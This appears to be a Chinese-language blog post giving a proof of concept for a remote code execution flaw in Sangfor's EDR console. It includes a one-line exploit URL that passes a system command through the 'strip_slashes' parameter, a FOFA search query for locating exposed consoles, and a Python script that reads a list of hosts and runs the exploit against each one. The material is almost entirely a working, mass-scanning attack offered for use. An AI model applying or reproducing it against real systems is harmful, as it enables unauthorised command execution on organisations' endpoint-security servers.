深信服EDR-RCE

poc

1
https://test.com/tool/log/c.php?strip_slashes=system&host=id

复现

fofa

1
title="终端检测响应平台"

简陋验证脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/usr/bin/python3
import requests
#import sys

requests.packages.urllib3.disable_warnings()

def edr_rce(url):

url3 = 'https://'+url.strip() + '/tool/log/c.php?strip_slashes=system&host=id'

headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36'
}

resp = requests.get(url=url3, headers=headers,verify=False)
if 'root' in resp.text:
print(url3 + ':'+ '存在EDR_RCE漏洞')
else:
print(url3 + ':'+ '不存在EDR_RCE漏洞')

if __name__ == '__main__':

f = open("injection.txt")
line = f.readline()
for line in open("injection.txt"):
url = line.strip()
try:
edr_rce(url)
except:
pass
f.close()
print('运行结束')